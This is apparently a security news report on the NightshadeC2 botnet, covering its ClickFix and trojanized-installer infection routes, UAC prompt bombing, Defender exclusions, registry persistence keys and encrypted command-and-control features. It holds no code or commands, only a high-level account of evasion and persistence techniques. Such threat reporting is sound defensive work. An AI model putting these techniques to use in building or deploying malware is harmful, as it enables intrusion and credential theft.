New NightshadeC2 Botnet Uses ‘UAC Prompt Bombing’ to Bypass Windows Defender Protections

Cybersecurity: NightshadeC2 Botnet Analysis

In early August 2025, security experts identified a new botnet strain, NightshadeC2, capable of bypassing Windows Defender protections. This malware employs both C and Python-based payloads to gain persistent remote control over compromised systems.

Infection Vectors

NightshadeC2 commonly initiates infections using customized “ClickFix” landing pages that induce users to execute commands through the Windows Run prompt. Additionally, it uses trojanized installers of popular utilities like Advanced IP Scanner, CCleaner, and various VPN clients.

Technical Execution

Upon execution, NightshadeC2 escalates privileges, disables Defender components, and connects to a dynamic command and control infrastructure. A distinctive .NET-based loader is employed to deliver the final payload, which includes mechanisms to bypass security checks such as “UAC Prompt Bombing.”

Stealth and Evasion Techniques

The botnet uses a routine called “UAC Prompt Bombing” to repeatedly request elevation, frustrating both automated defenses and real users. This technique ensures the malware’s components are excluded from Defender scans, securing persistence entries in registry locations like Winlogon, RunOnce, and Active Setup.

Communication and Control

Once established, the malware communicates with its command and control server over TCP ports 80, 443, or high-numbered ports. It collects system details to create a unique fingerprint and initiates an RC4-encrypted session for further commands, including reverse shell initiation, payload downloads, and keylogging.

Implications

NightshadeC2’s ability to bypass automated and manual inspections poses a significant threat, allowing operators to conduct credential theft from browsers, establish hidden web browsers, and maintain long-term persistence within targeted networks.